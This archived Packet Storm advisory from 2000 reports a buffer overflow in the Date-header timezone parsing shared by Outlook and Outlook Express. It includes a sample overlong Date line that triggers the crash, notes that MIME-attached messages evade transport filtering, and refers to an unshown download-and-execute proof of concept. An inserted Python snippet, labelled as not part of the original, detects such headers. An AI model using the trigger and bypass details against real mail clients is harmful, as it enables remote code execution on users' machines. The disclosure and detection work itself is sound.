outlook.advisory.txt

2000-07-19T00:00:00
ID PACKETSTORM:22576
Type packetstorm
Reporter Aaron Drew
Modified 2000-07-19T00:00:00

Description

_______________________________________________________________  
  
Security Advisory: Buffer Overflow in MS Outlook & Outlook Express Email Clients  
  
Date: 18th July 2000  
Author: Aaron Drew (mailto:ripper@wollongong.hotkey.net.au)  
Versions Affected: MS Outlook 97/2000 and MS Outlook Express 4/5  
  
_______________________________________________________________  
  
A bug in a shared component of Microsoft Outlook and Outlook Express mail  
clients can allow a remote user to write arbitrary data to the stack. This  
bug has been found to exist in all versions of MS Outlook and Outlook  
Express on both Windows 95/98 and Windows NT 4.  
  
The vulnerability lies in the parsing of the GMT (timezone) section of the Date  
field in the header of an email. Bounds checking on the token representing the  
GMT offset is not properly performed. This bug can be witnessed by opening an  
email with an exceptionally long string directly following the GMT offset in  
the Date header field, such as:  
  
Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
The bug lies in the shared library INETCOMM.DLL and has been successfully  
exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.  
  
The overflow is triggered differently under each client. Under Outlook  
Express, the buffer overflow occurs as soon as the user tries to view the  
mail folder containing an email with a malicious Date header. Under Microsoft  
Outlook, the overflow occurs when attempting to preview, read, reply to or  
forward any email with a malicious Date header. Under MS Outlook a user may  
delete or save an email to disk without triggering the overflow.  
  
Whilst some mail transport systems seem to modify 8-bit header data or lines  
over 70 characters in length, preventing direct exploitation, these  
restrictions seem to be avoided by encoding a message with a malicious Date  
field as a MIME attachment in Outlook's MIME-attached message format.  
These messages also overflow the stack when read, previewed, replied to or  
forwarded.  
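As an added defensive example (not part of the original advisory), the following Python walks a message, including any message/rfc822 attachments of the kind the advisory describes, and flags every Date header whose timezone token is longer than any legitimate zone spelling. The sample message, the 5-character threshold and the addresses are constructed assumptions.

```python
import email
import re

# Constructed assumption: RFC 822 numeric zones are 5 chars ("+1000"); alphabetic
# zones (GMT, UT, EST) are shorter. A longer token cannot be a legitimate zone.
MAX_ZONE_LEN = 5

# Match the time-of-day, then capture the whitespace-delimited token after it,
# i.e. the zone field whose length is the trigger described in the advisory.
ZONE_RE = re.compile(r"\d{1,2}:\d{2}(?::\d{2})?\s+(\S+)")


def zone_token(date_value):
    """Return the timezone token of a Date header value, or None if absent."""
    m = ZONE_RE.search(date_value)
    return m.group(1) if m else None


def suspicious_date(date_value):
    """True when the zone token is longer than any valid zone spelling."""
    tok = zone_token(date_value)
    return tok is not None and len(tok) > MAX_ZONE_LEN


def scan_message(raw):
    """Scan a raw RFC 822 message and every nested part (walk() descends into
    message/rfc822 attachments). Returns [(part_index, zone_token), ...]."""
    msg = email.message_from_bytes(raw)
    findings = []
    for idx, part in enumerate(msg.walk()):
        for value in part.get_all("Date", []):
            if suspicious_date(value):
                findings.append((idx, zone_token(value)))
    return findings


# Constructed sample: a benign outer message carrying a message/rfc822
# attachment whose inner Date header has an overlong zone token.
SAMPLE = (
    b"From: a@example.test\r\nDate: Fri, 13 Jul 2000 14:16:06 +1000\r\n"
    b"MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary=\"bnd\"\r\n"
    b"\r\n--bnd\r\nContent-Type: text/plain\r\n\r\nsee attached\r\n"
    b"--bnd\r\nContent-Type: message/rfc822\r\n\r\n"
    b"From: c@example.test\r\nDate: Fri, 13 Jul 2000 14:16:06 +1000"
    + b"x" * 80 + b"\r\nSubject: inner\r\n\r\nbody\r\n--bnd--\r\n"
)

if __name__ == "__main__":
    for idx, tok in scan_message(SAMPLE):
        print(f"part {idx}: overlong zone token ({len(tok)} chars)")
```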
  
Microsoft was notified of this bug on July 3.  
  
Attached is a proof-of-concept exploit that, when placed in the header  
field of a message or MIME-attached message, will download and execute  
an executable from the web. (In this particular case it will launch MS Freecell.)  
  
_______________________________________________________________  
  
DISCLAIMER  
  
The information within this document may change without notice. Use of  
this information constitutes acceptance for use in an AS IS  
condition. There are NO warranties with regard to this information.  
In no event shall the author be liable for any consequences whatsoever  
arising out of or in connection with the use or spread of this  
information. Any use of this information lays within the user's  
responsibility.  
  
_______________________________________________________________  
  
  